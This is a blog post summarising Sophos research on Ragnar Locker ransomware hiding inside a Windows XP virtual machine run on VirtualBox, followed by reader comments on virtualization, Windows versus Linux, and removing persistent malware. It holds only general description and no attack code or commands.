Hiding Malware, With Windows XP

In the nearly four decades since the first PC viruses spread in the wild, malware writers have evolved some exceptionally clever ways to hide their creations from system administrators and from anti-virus writers. The researchers at Sophos have found one that conceals itself as probably the ultimate Trojan horse: it hides its tiny payload in a Windows XP installation.

The crusty Windows version is packaged up with a copy of an older version of the VirtualBox hypervisor on which to run it. A WIndows exploit allows Microsoft Installer to download the whole thing as a 122 MB installer package that hides the hypervisor and a 282 MB disk image containing Windows XP. The Ragnar Locker ransomware payload is a tiny 49 kB component of the XP image, which the infected host will run on the hypervisor unchallenged.

The Sophos analysis has a fascinating delve into some of the Windows batch file tricks it uses to probe its environment and set up the connections between host and XP, leaving us amazed at the unorthodox use of a complete Microsoft OS and that seemingly we have reached a point of system bloat at which such a large unauthorised download and the running of a complete Microsoft operating system albeit one from twenty years ago in a hypervisor can go unnoticed. Still, unlike some malware stories we’ve seen, at least this one is real.

18 thoughts on “Hiding Malware, With Windows XP

    1. Mostly works normally. I am frequently using nested virtualization of ESXi in VMware Workstation for either POCs or replicating client’s infrastructure segments. Some networking limitations are present, but not critical.

  1. Well, it works. Rather slow without enabling nested virtualization (making cpu hw vm features available to the guest)… but performance is not really that important to ransom ware..

    1. Only thesedays, back when XP was around windows was actually quite good. i have many fond memories of using XP. Today I’m a windows refugee who has fled to linux (mint/ubuntu) to escape the tyranny of (Windows) Ten and its obsession with forcible updates to break your system when you can least afford them and generally remote management and dependence on cloud infrastructure.

      1. This. Windows update has broken so many device drivers and software packages that I have started to make disk images when things seem to be working too well on my gaming machine. On the other hand, I have never had apt upgrade break anything other than my own hacky scripts.

      2. Yeah I enjoyed XP as well. For me it was fast, stable, and still had good compatibility for some special older programs that I still use. It probably won’t get much love here thanks to some hippies stealing unix changed the world for most folks here but I really thought xp was pretty decent. Some of the later slim releases will run on remarkably limited machines. I went to the penguin for a while until it got bloated and went to win7 which was also pretty darn good. Then 10 came out. I had mixed feelings at first but with a little tweaking I have it doing like I want and am enjoying the lin kernel and shell updates. I honestly feel like if folks put a tenth of the effort into taming some unwanted features of 10 that they do into getting Linux to do some things, they wouldn’t mind it so much but to each their own. I don’t hate linux at all but feel like it has encountered a lot of the gripes people had about windows as it has grown up plus the 8000 distros out there which is just utter confusion for better or worse. I was glad to see your comment because it is a rarity on HaD and think it is funny to see MS and Apple grow in opposite directions imho. I think the only thing I will respectfully disagree with is the dependency of the cloud thing as they alllllllll do that these days. Either way, happy computing and deving :)

  2. I remember the first malware that could survive switching to Windows XP Safe Mode. Normally Safe Mode would block malware from running and would leave the malware program files exposed to be findable and deletable.

    Then someone figured out how to make their malware make randomly renamed backup copies (and other tricks to hide it) when Windows was shut down. That process also cleared out the obvious stuff it put in the Registry so the malware was nowhere to be found in Safe Mode. Could even run a deep scan of every file and it wouldn’t be found.

    The trick to stop it was literally pulling the plug. While running in normal mode, yank the power cord out or turn off the switch on the power supply. Then boot directly to Safe Mode. Booting normally would allow the malware to stay because it could recover from that.

    So with the latest malware file names reported by your favorite anti software, you could delete all the files in Safe Mode then reboot to normal mode, then your anti software would be able to clean the Registry.

    Of course the malware a-holes eventually figured out how to have their software protect itself against cutting the power, by hacking Windows deep enough they could have the malware running and self-protecting in Safe Mode. Only ways to kill that were by pulling the plug (because shutting down normally would allow the malware to hide itself) then booting with a live CD with removal software, or by wiping the hard drive and doing a clean install.

    1. >wiping the hard drive and doing a clean install

      The best way to keep Windows XP fast and clean.

      I had nLite CD with integrated drivers. Then it was matter of installing Gothic II, latest versions of Opera, Foobar2000 and PC was ready again in no time.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.